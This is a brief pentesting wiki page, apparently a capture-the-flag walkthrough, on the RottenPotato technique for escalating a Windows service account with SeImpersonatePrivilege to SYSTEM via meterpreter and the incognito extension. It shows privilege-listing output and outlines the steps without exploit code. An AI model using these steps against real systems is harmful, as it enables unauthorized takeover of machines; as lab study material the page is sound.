RottenPotato

The info in this page info was extracted from this post

Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.

Let’s check our privileges with meterpreter:

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload rottenpotato.exe

Back on our meterpreter session we load the incognito extension.

We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.

We need to quickly impersonate the token or it will disappear.

Success! We have our SYSTEM shell and can grab the root.txt file!

PreviousPrivilege Escalation with AutorunsNextSeatbelt

Last updated